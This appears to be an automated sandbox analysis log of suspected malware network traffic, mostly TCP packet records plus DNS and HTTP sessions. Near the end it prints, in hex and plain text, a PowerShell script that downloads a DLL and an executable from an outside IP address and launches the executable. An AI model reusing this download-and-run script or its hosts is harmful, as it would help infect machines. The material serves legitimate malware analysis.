                                                                                                              Dec 19, 2024 08:12:00.111037970 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111056089 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.111077070 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.111110926 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111129999 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111181021 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.111221075 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111231089 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111280918 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.111282110 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111332893 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.111402988 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111452103 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.111615896 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111660957 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.111747026 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111845970 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111846924 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.111855984 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111866951 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111884117 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111906052 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.111921072 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.111958027 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.111968040 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112013102 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112032890 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112041950 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112082958 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112202883 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112277031 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112286091 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112318039 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112325907 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112370014 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112404108 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112447023 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112483978 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112548113 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112582922 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112616062 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112629890 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112665892 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112694979 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112736940 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112826109 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112880945 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112890005 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.112951994 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.112989902 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113126040 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113136053 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113156080 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.113156080 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113178968 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.113198996 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.113327980 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113394022 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113404036 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113411903 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.113446951 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.113487005 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113497019 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113549948 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.113698006 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113707066 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113754034 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.113867998 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113965034 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.113979101 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.113987923 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114027023 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.114029884 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114039898 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114070892 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114082098 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.114160061 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.114233017 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114243031 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114278078 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.114382029 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114440918 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.114691973 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114744902 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.114814043 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114862919 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.114937067 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114947081 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114980936 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.114983082 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.114989996 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115035057 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115061998 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115071058 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115087986 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115109921 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115142107 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115179062 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115189075 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115226984 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115236044 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115277052 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115293026 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115302086 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115346909 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115348101 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115355968 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115401030 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115468025 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115477085 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115484953 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115494013 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115510941 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115519047 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115535021 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115565062 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115566015 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115653038 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115657091 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115667105 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115701914 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115706921 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115710020 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115751028 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115834951 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115844965 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115852118 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115869045 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115879059 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115883112 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115916967 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115933895 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.115955114 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.115962982 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116003990 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116034031 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116117001 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116128922 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116180897 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116182089 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116239071 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116271973 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116285086 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116286993 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116329908 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116411924 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116420984 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116456032 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116460085 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116590977 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116600037 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116646051 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116655111 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116687059 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116695881 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116823912 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116823912 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116835117 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116867065 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116883039 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116890907 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116926908 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.116959095 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.116978884 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117022038 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.117114067 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117259026 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117268085 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117309093 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.117309093 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117342949 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.117420912 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117458105 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117512941 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.117643118 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117650986 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117686987 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117690086 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.117723942 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.117840052 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117849112 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117857933 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117887020 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.117909908 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.117943048 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117952108 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.117980957 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.117997885 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118088007 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118097067 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118134975 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118201971 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118211031 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118257999 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118347883 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118357897 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118387938 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118401051 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118408918 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118451118 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118536949 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118580103 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118617058 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118626118 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118659973 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118678093 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118736982 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118771076 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118778944 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118839979 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118880987 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118899107 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118928909 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118937969 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118968010 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.118983030 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.118988037 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.119030952 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.119143009 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119151115 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119199991 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.119281054 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119290113 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119333982 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.119350910 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119401932 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.119437933 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119448900 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119493961 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.119575024 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119690895 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119699955 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119735956 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.119743109 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119762897 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.119786978 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.119820118 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.119863033 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.120023966 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.120295048 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.153131008 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.153286934 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.153393984 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.153429985 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.192733049 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.192805052 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.222187042 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.222335100 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.222623110 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.222692013 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.222742081 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.222796917 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.222842932 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.222897053 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.222939968 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.223000050 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.223046064 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.223112106 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.223176956 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.223227024 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.239089966 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.239231110 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.239342928 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.239402056 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.239459038 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.264056921 CET1566649740193.3.19.151192.168.2.4
                                                                                                              Dec 19, 2024 08:12:00.264208078 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.264539957 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.264606953 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.264657974 CET4974015666192.168.2.4193.3.19.151
                                                                                                              Dec 19, 2024 08:12:00.264714956 CET4974015666192.168.2.4193.3.19.151
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 19, 2024 08:11:52.324043036 CET192.168.2.41.1.1.10x15b9Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 19, 2024 08:11:52.463160992 CET1.1.1.1192.168.2.40x15b9No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 08:11:52.463160992 CET1.1.1.1192.168.2.40x15b9No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 08:11:52.463160992 CET1.1.1.1192.168.2.40x15b9No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.449731147.45.47.15804144C:\Windows\SysWOW64\curl.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 08:11:37.535695076 CET86OUTGET /script.ps1 HTTP/1.1
                                                                                                              Host: 147.45.47.15
                                                                                                              User-Agent: curl/7.83.1
                                                                                                              Accept: */*
                                                                                                              Dec 19, 2024 08:11:38.793356895 CET528INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 07:11:38 GMT
                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                              Last-Modified: Wed, 18 Dec 2024 13:30:31 GMT
                                                                                                              ETag: "144-6298b6af57ff8"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 324
                                                                                                              Data Raw: 0d 0a 24 64 6c 6c 50 61 74 68 20 3d 20 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 69 76 69 65 77 65 72 73 2e 64 6c 6c 22 0d 0a 24 65 78 65 50 61 74 68 20 3d 20 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 4c 61 75 6e 63 68 65 72 2e 65 78 65 22 0d 0a 0d 0a 24 64 6c 6c 55 72 6c 20 3d 20 22 68 74 74 70 3a 2f 2f 31 34 37 2e 34 35 2e 34 37 2e 31 35 2f 69 76 69 65 77 65 72 73 2e 64 6c 6c 22 0d 0a 24 65 78 65 55 72 6c 20 3d 20 22 68 74 74 70 3a 2f 2f 31 34 37 2e 34 35 2e 34 37 2e 31 35 2f 4c 61 75 6e 63 68 65 72 2e 65 78 65 22 0d 0a 0d 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 24 64 6c 6c 55 72 6c 20 2d 4f 75 74 46 69 6c 65 20 24 64 6c 6c 50 61 74 68 0d 0a 0d 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 24 65 78 65 55 72 6c 20 2d 4f 75 74 46 69 6c 65 20 24 65 78 65 50 61 74 68 0d 0a 0d 0a 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 24 65 78 65 50 61 74 68 0d 0a 0d 0a
                                                                                                              Data Ascii: $dllPath = "C:\Windows\Temp\iviewers.dll"$exePath = "C:\Windows\Temp\Launcher.exe"$dllUrl = "http://147.45.47.15/iviewers.dll"$exeUrl = "http://147.45.47.15/Launcher.exe"Invoke-WebRequest -Uri $dllUrl -OutFile $dllPathInvoke-WebRequest -Uri $exeUrl -OutFile $exePathStart-Process -FilePath $exePath


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.449734147.45.47.15803736C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 08:11:39.580110073 CET169OUTGET /iviewers.dll HTTP/1.1
